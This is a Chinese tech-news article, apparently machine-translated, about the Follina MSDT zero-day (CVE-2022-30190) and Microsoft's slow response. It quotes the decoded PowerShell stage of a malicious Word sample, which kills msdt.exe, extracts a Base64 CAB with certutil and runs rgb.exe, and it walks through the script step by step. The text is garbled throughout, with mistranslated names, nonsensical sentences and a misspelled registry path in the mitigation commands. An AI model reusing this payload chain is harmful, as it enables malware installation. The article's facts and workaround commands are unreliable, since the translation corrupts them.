整理 | 郑丽媛
《持发委新闻》(ID:持发委新闻)
所有 Windows 用户都应该知道, 高风险零日脆弱性至少已经存在七个星期了, 有证据表明黑客利用它在用户个人电脑上安装恶意软件“安静地”!
起初微软不以为意
根据一个影子追逐者小组的 研究者的推特账户,微软支持诊断工具(微软支持诊断工具)有这一差距。这称为MSDT。4月12日,微软也接到报告。即使为了证明它的严重性,黑客利用漏洞发动攻击的证据也证明了这一点。
然而微软并不认为这是安全缺陷。据安保反应中心工作人员说在运行有效载荷之前,MSDT需要密码。可上周五,当研究人员Kevin Beaumont发现寄给Thatal病毒的Word文件 感染了未知的攻击媒介时,他说:洞穴又重现了
Kevin Beaumont认为,该文件使用Word从远程网络服务器收集 HTML 文件,然后使用微软 URI 程序装载和执行PowerShell 指令。
这种方法可能看起来不可信,但根据Kevin Beaumont的说法,当对文档中的命令进行解码时,它们转而使用:
$cmd = "c:windowssystem32cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:userspublic&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
约翰哈蒙德,狩猎安全研究员, 检查剧本:
1. 如果 msdt 正在运行, 启动隐藏窗口 。2. 回收经过RAR的档案。(1) 将此 Base64 代码化 CAB 文件设置为 1. t(2) 代码化为 Base64 代码化为 CAB 文件存储为 1. c 将被 1. c CAB (3) 文件扩展至当前位置最后,运行 rgb( 可能压缩为 1. c CAB 文件) 。
7周后"觉醒"
微软终于在本周的星期一“醒悟”:这个漏洞被贴上CVE 2022-30190的标签,
当使用 URL 协议从应用程序( 如 Word) 中调用 MSDT 时,存在远程执行代码差距。成功利用这个弱点的进攻者 有能力运行任何代码 使用权利 呼叫程序。随后,在其权力范围内,攻击者可以安装软件。查看、修改或删除数据。或创建新帐户。
与披露缺陷、释放修正和要求用户升级的标准程序相反,微软公司在泄漏时没有发出任何补丁,解决办法只是敦促用户禁止MSDT URL协议如下:
1. 以管理员身份启动命令。
2. 执行命令“reg 导出 HKEY_CLASSES_ROOTMS-msdt 文件名” 以备份注册项目 。
三,使用命令"reg 清除HKEY_CLASSES_ROTTMS-MSDT/f"。
鉴于微软公司尚未提供弥补这一差距的类似办法,区别是"高风险"和"高风险"建议微软办公室的所有用户在微软实施进一步保障措施之前定期这样做。确保MSDT URL 协议完全关闭 。根据需要,对从因特网获得的任何文件进行彻底检查。
https://arstechnica.com/information-technology/2022/05/code-execution-0day-in-windows-has-been-under-active-exploit-for-7-weeks/
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
成就一亿技术人